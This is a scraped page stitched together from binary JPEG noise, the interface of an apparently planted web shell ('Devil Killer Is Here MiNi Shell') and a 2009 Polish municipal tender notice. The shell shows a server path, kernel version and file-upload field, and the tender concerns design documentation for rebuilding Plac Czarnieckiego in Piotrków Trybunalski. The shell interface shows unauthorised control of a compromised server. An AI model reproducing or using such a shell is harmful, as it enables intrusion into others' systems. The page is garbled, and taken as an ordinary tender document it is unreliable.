JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/145271-N-2009.html

<p class="kh_header"><b>Piotrków Trybunalski: OPRACOWANIE DOKUMENTACJI PROJEKTOWO - KOSZTORYSOWEJ DLA ZADANIA PN. PRZEBUDOWA PLACU CZARNIECKIEGO WRAZ Z BUDOWĄ, PRZEBUDOWĄ NIEZBĘDNEJ INFRASTRUKTURY TECHNICZNEJ</b><br>
<b>Numer ogłoszenia: 145271 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWO - KOSZTORYSOWEJ DLA ZADANIA PN. PRZEBUDOWA PLACU CZARNIECKIEGO WRAZ Z BUDOWĄ, PRZEBUDOWĄ NIEZBĘDNEJ INFRASTRUKTURY TECHNICZNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej dokumentacji projektowej przebudowy Placu Czarnieckiego w Piotrkowie Trybunalskim wraz z budową, przebudową niezbędnej infrastruktury technicznej obejmującej:

KONCEPCJĘ
- Koncepcję drogową  przebudowy Placu Czarnieckiego sporządzoną co najmniej w 2 wariantach wykonaną z uwzględnieniem założeń Studium urbanistycznego sporządzonego przez Pracownię Projektową ARCHITEKT z m-ca grudnia 2004 roku, która powinna zawierać :
- plan sytuacyjny w skali 1: 500 lub 1:1.000, 
- opis rozwiązań koncepcyjnych m.in. zakładaną konstrukcję budowy jezdni, chodników dla pieszych, parkingów, wprowadzenie elementów małej architektury: słup ogłoszeniowy, ławki, wymianę lamp oświetleniowych, koncepcja projektowanej zieleni oraz wyznaczenie miejsca na elektroniczny punkt informacyjny BOM-u, 
- określenie przewidywanych kosztów dla poszczególnych wariantów
 	PROJEKT BUDOWLANO-WYKONAWCZY
- Wykonanie mapy  do celów projektowych w skali 1:500 (z dokonaniem kontroli usytuowania sieci podziemnych uzbrojenia terenu poprzez pomiar wszystkich elementów naziemnych sieci),
- Ocenę stanu nawierzchni jezdni,
- Projekt zagospodarowania terenu,  
- Projekt budowlany i projekt wykonawczy przebudowy Placu Czarnieckiego             z elementami małej architektury i punktem elektronicznym informacji BOM-u, 
- Projekty budowlany i projekt wykonawczy budowy  kanalizacji deszczowej z uwzględnieniem odwodnienia Placu Czarnieckiego wraz z przyłączami i wpustami,
- Projekt budowlany i projekt wykonawczy wymiany przyłączy wodociągowych oraz węzłów wodociągowych (zasuwy i hydranty p.poż),
- Projekty budowlane i projekty wykonawcze przebudowy i rozbudowy oświetlenia,
- Projekt budowlany i projekt wykonawczy usunięcia ewentualnych kolizji                 i przebudowy istniejących sieci,
- Projekty budowlane i projekty wykonawcze obejmujące:
demontaż linii napowietrznych 0,4 kV wraz z przyłączami napowietrznymi na Placu Czarnieckiego - po stronie wschodniej oraz po stronie zachodniej, w miejscu demontowanych linii napowietrznych należy wybudować dwie linie kablowe 0,4kV bezpośrednio ze stacji transformatorowych nr 1-0237 Zamurowa,( UWAGA - zakres projektu branży elektrycznej skoordynować z projektantem przebudowy i rozbudowy sieci energetycznej dla ulicy Zamkowej)
- Wyniesienie układów pomiarowych z wnętrza lokali i przebudowę wewnętrznych linii zasilających w zakresie wynikającym z przebudowy sieci zasilających wg Warunków technicznych,
- Projekt organizacji ruchu na czas budowy i docelowy,
- Przedmiary robót  + wersja elektroniczna,
- Kosztorysy inwestorskie + wersja elektroniczna,
- Specyfikacje techniczne wykonania i odbioru robot (branża drogowa,                  sanitarna, elektryczna) + wersja elektroniczna,
- uzyskanie niezbędnych opinii i uzgodnień ,
- Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia,                  ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnionej w planie bezpieczeństwa i ochrony zdrowia (Dz.U.120 z 2003 r. poz. 1126),

Uwaga! Przy opracowaniu dokumentacji należy uwzględnić etapowanie :
- Etap 1 :   koncepcja drogowa ,
- Etap 2 :   projekty budowlane i projekty wykonawcze przebudowy Placu Czarnieckiego wraz z niezbędną infrastrukturą techniczną w  oddzielnych opracowaniach :
Opracowanie 1: projekt budowlany i wykonawczy przebudowy Placu Czarnieckiego wraz z projektem zagospodarowania terenu z przedmiarem, kosztorysem i specyfikacjami technicznymi wykonania i odbioru robót  - branża drogowa,
Opracowanie 2: projekt budowlany i projekt wykonawczy budowy/przebudowy niezbędnej infrastruktury technicznej wraz z przedmiarem, kosztorysem i specyfikacjami technicznymi wykonania i odbioru robót -  branża sanitarna
Opracowanie 3: projekt budowlany i projekt wykonawczy  przebudowy oświetlenia ulicznego wraz z przedmiarem, kosztorysem i specyfikacjami technicznymi wykonania i odbioru robót  - branża elektryczna,
- Opracowanie  4:   projekty budowlane i projekty wykonawcze przebudowy istniejących linii napowietrznych 0,4 kV, zasilających ze stacji transformatorowej nr 1-0237 Zamurowa  ze złączami kablowymi w podwórkach posesji,  z przedmiarami wraz kosztorysami i specyfikacjami technicznymi wykonania i odbioru robót,

Uwaga! Przy określaniu całkowitej wartości zamówienia  należy 
określić koszt  dokumentacji z rozbiciem na koncepcję i  poszczególne  opracowania  od nr 1 do nr 4 z tym, że dodatkowo dla opracowania nr 2 należy podać oddzielnie koszty opracowania dla kanalizacji deszczowej z przyłączami i dla przyłączy wodociągowych  


Ponadto: 
- Projektant jest zobowiązany do zachowania szczególnej ostrożności  w zakresie ochrony znaków osnowy geodezyjnej. W przypadku jeżeli realizacja projektowanej inwestycji nie może się obyć bez zniszczenia znaków, w kosztorysie inwestorskim należy przewidzieć koszty ich odtworzenia. Ponadto w kosztorysie inwestorskim należy przewidzieć koszty przejęcia stanu znaków osnowy geodezyjnej przed  i po wejściu Wykonawcy na plac budowy. 
- W kosztorysie inwestorskim i przedmiarze należy dla projektowanych przyłączy uwzględnić odcinek od sieci do granic posesji. Przebieg przyłączy do budynków powinien być uzgodniony z właścicielem posesji (należy załączyć oświadczenia). 
- Zastosowanie takich materiałów budowlanych by całkowita wartość kosztorysowa przedmiotowego zadania nie przekroczyła wartości zaplanowanej dla zadania Trakt Wielu Kultur wynikającej z Programu Funkcjonalno-Użytkowego, który  Biuro Inwestycji i Remontów przekaże Projektantowi w celu uwzględnienia                      w przedmiotowym projekcie:
- Studium urbanistyczne zagospodarowania ulic w obrębie Starego Miasta               w Piotrkowie Trybunalskim - grudzień 2004r. 
- Warunki techniczne wydane przez Miejski Zakład Gospodarki Komunalnej                z dnia 23.03.2009  roku, wytyczne Miejskiego Zarządu Dróg i Komunikacji,
- Warunki techniczne z PGE Dystrybucja Łódź - Teren S.A. Rejonu Energetycznego Piotrków Trybunalski z dnia 27.03.2009 r. znak 01-TR-001205-2009,
- Program Funkcjonalno-Użytkowy z m-ca czerwca 2009 roku,
- Inne posiadane decyzje, opinie i uzgodnienia dla Traktu Wielu Kultur ,
- Raport oddziaływania na środowisko wraz z decyzją OOŚ, 
- Przy wystąpieniu kolizji z istniejącą infrastrukturą Projektant uzyska niezbędne warunki techniczne dla jej przebudowy. 

Dokumentację projektowo-kosztorysową należy wykonać w ilości  :
1.Koncepcja drogowa  - 4 egz.
2.Projekty budowlane i wykonawcze (branża drogowa,  sanitarna, elektryczna)      
   - 7  egz. + wersja elektroniczna
3.Przedmiary robót -  2 egz. + wersja elektroniczna
4.Kosztorysy inwestorskie -  2 egz. + wersja elektroniczna
5.Specyfikacje techniczne wykonania i odbioru robót (branża drogowa,  sanitarna, elektryczna)  - 2 egz. + wersja elektroniczna

- Dokumentacja winna spełniać wymogi określone w Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 z 2003 r. poz.1133 ), 
- Dokumentacja projektowa winna być sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 120 z 2003 r. poz.1133),                
- Przedmiary robót i kosztorysy inwestorskie należy wykonać zgodnie z wymogami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiający żąda wniesienia wadium..
1. Wykonawca zobowiązany jest do wniesienia wadium do dnia 10.09.2009 r.  do godz. 9:00 w wysokości 2.500 zł. 
2. Wadium może być wniesione w następujących formach:
a) pieniądzu wpłaconym przelewem na rachunek bankowy BGŻ O Piotrków Tryb. Nr : 05203000451110000000261430 Uwaga: Na poleceniu przelewu należy zamieścić adnotację: Wadium - przetarg nieograniczony na: Dokumentację projektowo - kosztorysową dla zadania pn. przebudowa Placu Czarnieckiego 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych ,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DZ. U. Nr 109 poz. 1158, z późn. zm.).  
3. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
4. Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do Referatu Zamówień Publicznych w Urzędzie Miasta, do pokoju nr 317 przed terminem składania ofert, a do oferty załączyć kserokopię. 
5.Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1) Posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków oraz opłat i składek na ubezpieczenie zdrowotne i społeczne; wg załącznika nr 6
2) Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem       technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności wykonawca musi spełniać następujące warunki. 
W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)Wykaz wykonanych min. 2 zamówień w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie tj. 2 usługi dotyczące przedmiotu zamówienie tj. projekty sieci infrastruktury technicznej i drogowej o wartości nie mniejszej niż 70.000 zł brutto każda - wg załącznika nr 4.
b)Referencje potwierdzające należyte wykonanie prac wskazanych w załączniku nr 4
c)wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zadania, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz dokumenty potwierdzające posiadanie przez te osoby wymaganych uprawnień tj. branża drogowa, sanitarna, elektryczna oraz przynależność do Izby Inżynierów Budownictwa - wg załącznika nr 5.
3) Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   	 niniejszego zamówienia. 
4) Nie podlegać wykluczeniu z postępowania na postawie art. 24 ustawy prawo zamówień publicznych. W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są przedłożyć następujące dokumenty:	
a)oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie            art. 24 ust 1 oraz ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 3;

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.
Zamawiający, na podstawie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia      i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
Zamawiający wykluczy z postępowania wykonawców w przypadkach określonych     w art. 24 ustawy Prawo zamówień publicznych. Ofertę wykonawcy wykluczonego uważa się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania ofert przez wykonawców ubiegających się wspólnie              o udzielenie zamówienia, wymagany dokument musi być złożony przez każdego z nich.
2. oświadczenie wykonawcy potwierdzające spełnienie wymagań określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 2. W przypadku podmiotów występujących wspólnie oświadczenie składa każdy  z nich. 
3.oświadczenie, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 6. W przypadku składania ofert przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez każdego z nich.
4.wykaz wykonanych min. 2 zamówień w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, tj. 2 usługi dotyczące przedmiotu zamówienia tj. projekty sieci infrastruktury technicznej i drogowej o wartości nie mniejszej niż 70.000 zł brutto każda wg załącznika nr 4. W przypadku składania oferty przez wykonawców, ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawców.
5.Referencje potwierdzające należyte wykonanie prac wskazanych w załączniku  nr 4.
6.wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zadania, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz dokumentami potwierdzającymi posiadanie przez te osoby wymaganych uprawnień tj. branża drogowa, sanitarna, elektryczna, oraz przynależność do Izby Inżynierów Budownictwa - wg załącznika nr 5.
7.oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie            art. 24 ust 1 oraz ust. 2 ustawy Pzp. - wg załącznika nr 3; 
W przypadku składania ofert przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez każdego z nich.
8.W przypadku podmiotów występujących wspólnie - umowę regulującą współpracę tych podmiotów.
9.Pełnomocnictwo do reprezentowania wykonawcy jeśli nie wynika to z zapisów       w odpisie z rejestru lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej.
10.jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce 
zamieszkania potwierdzające odpowiednio, że;
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
11.	jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.piotrkow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta 
Pasaż K. Rudowskiego 10
Referat Zamówień Publicznych, pok. nr 317.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 09:00, miejsce: Urząd Miasta 
Pasaż K. Rudowskiego 10
Referat Zamówień Publicznych, pok. nr 317.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com